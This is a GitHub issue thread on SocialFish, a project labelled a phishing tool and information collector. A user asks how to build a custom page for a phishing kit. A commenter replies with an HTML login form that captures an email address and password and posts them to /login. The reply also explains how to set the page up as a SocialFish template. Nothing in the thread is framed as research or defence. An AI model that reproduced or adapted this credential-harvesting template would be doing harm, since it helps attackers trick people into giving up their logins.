UndeadSec / SocialFish

Phishing Tool & Information Collector
BSD 3-Clause "New" or "Revised" License
3.99k stars 1.28k forks source link

How can i make a custom website on blackeye can somoene help me with this #356

Open RozequartzD opened 1 year ago

franklintimoteo commented 11 months ago
<html>
<head></head>
<body>
    <form action="/login" method="POST">
        <label>Email Address</label>
        <input type="email" name="email" placeholder="Email" autocomplete="off">
        <label>Password</label>
        <input type="password" name="password" placeholder="Password" autocomplete="off">
        <button type="submit">sign in</button>                                
    </form>
</body>
</html>

Any website at socialfish need have: 1 form(POST) with 2 input. Named: email and password. Form post to /login input name: email input name: password

After put in ../templates

https://github.com/UndeadSec/SocialFish/wiki/Editing-custom-page